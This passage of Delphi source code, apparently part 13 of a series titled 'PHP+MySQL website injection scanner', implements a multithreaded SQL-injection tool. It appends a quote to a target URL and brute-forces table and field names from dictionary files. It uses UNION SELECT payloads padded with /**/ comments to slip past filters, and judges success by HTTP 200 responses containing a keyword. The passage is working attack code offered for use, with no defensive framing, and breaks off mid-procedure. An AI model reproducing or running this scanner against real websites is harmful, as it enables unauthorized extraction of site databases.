PHP+MYSQL网站注入扫描[13]

r/>  { public declarations }
  pg1:tprogressbar;
end;

var
form1: tform1;
//scantable :array of scantablethread; // 定义线程数组
scanfield :array of scanfieldthread;
scanmanager :array of scanmanagerthread;
scantable: scantablethread; //扫描表段线程
isfinish:boolean=false;

n:integer=0;
m:integer=0;

implementation


{$r *.dfm}

{ tform1 }

procedure tform1.msgbox(strmsg: string);
begin
application.messagebox(pchar(strmsg), '提示信息', mb_iconinformation);
end;

procedure tform1.seturl;
begin
begin
if rdbnum.checked then
  url := trim(edtinjurl.text)
else
  url := trim(edtinjurl.text)+#39;
end;
end;

procedure tform1.sbscanclick(sender: tobject);
var
scan:scanthread;
begin
if (edtinjurl.text='') then
begin
  msgbox('请输入要注入的地址！');
  exit;
end;
if (edtkey.text='') then
begin
  msgbox('请输入要注入的关键字！');
  exit;
end;
seturl;
keyword:=trim(edtkey.text);
pg1.visible :=false;
//scan :=scanthread.create(url,keyword,mm);
scan :=scanthread.create(false);
end;

function tform1.get(url,key: string): boolean;
var
idhttp: tidhttp;
ss: string;
begin
result:= false;
idhttp:= tidhttp.create(nil);
try
  try
    idhttp.handleredirects:= true;   //必须支持重定向否则可能出错
    idhttp.readtimeout:= 30000;     //超过这个时间则不再访问
    ss:= idhttp.get(url);
    if key='' then
    begin
    if idhttp.responsecode=200 then
      result :=true;
    end else
    begin
    if (idhttp.responsecode=200) and (pos(key,ss)>0) then
      result :=true;
    end;
  except
  end;
finally
  idhttp.free;
end;
end;

procedure tform1.sbstop1click(sender: tobject);
begin
stoped :=true;
pg1.visible :=false;
end;

//不使用线程
procedure tform1.injtable;
var
i,j:integer;
begin
if (istr='') or (keyword='') then exit;
lsbdict.items.clear;
lvtable.items.clear;
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_table.txt');
j:=0;
isfinish :=false;
screen.cursor :=crhourglass;
try
  for i:=0 to lsbdict.count-1 do
  begin
    if isfinish then break;
    injurl:=url+'/**/and/**/1=1/**/union/**/select/**/'+istr+
        '/**/from/**/'+lsbdict.items+'/*';

    mm.lines.add(injurl);
    if get(injurl,keyword) then
    begin
    inc(j);
    with lvtable.items.add do
    begin
      caption :=inttostr(j);
      subitems.add(lsbdict.items);
    end;
    end;
  end;
finally
  screen.cursor :=crdefault;
end;
end;

procedure tform1.sbscan1click(sender: tobject);
var
i:integer;
begin
if (strtoint(edtfieldnum.text)<=0) or (keyword='') then exit;
lsbdict.items.clear;
lvtable.items.clear;
n :=0;
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_table.txt');
isfinish :=false;
for i:=1 to strtoint(edtfieldnum.text) do
  istr:=istr+','+inttostr(i);
istr :=copy(istr,2,length(istr)-1);
//在一个线程内完成表段猜解工作
scantable :=scantablethread.create(url,istr,keyword,mm,lvtable);
end;

procedure tform1.sbscan2click(sender: tobject);
var
i,j,sum:integer;
tablename:string;
begin
if lvtable.items.count<=0 then exit;
if lvtable.selcount<=0 then
begin
  msgbox('请选择一个表名！');
  exit;
end;
tablename :=trim(lvtable.selected.subitems.gettext);
if tablename='' then exit;

if isfinish=false then
begin
  lsbdict.items.clear;
  lvfield.items.clear;
  mm.clear;
  n :=0;
  lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_field.txt');
  sum :=lsbdict.count;
  istr :='';
    pg1.min :=0;
  pg1.max :=sum;
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
  mm.lines.add('开始猜解字段。。。');
  mm.lines.add('');
  for i:=1 to strtoint(edtfieldnum.text) do
  begin
    if i=strtoint(spnum.text) then
    istr :=istr+',&fieldname&'
    else istr :=istr+','+inttostr(i);
  end;
  if istr<>'' then
    istr :=copy(istr,2,length(istr)-1);

  setlength(scanfield,sum);   // 动态设置线程的数量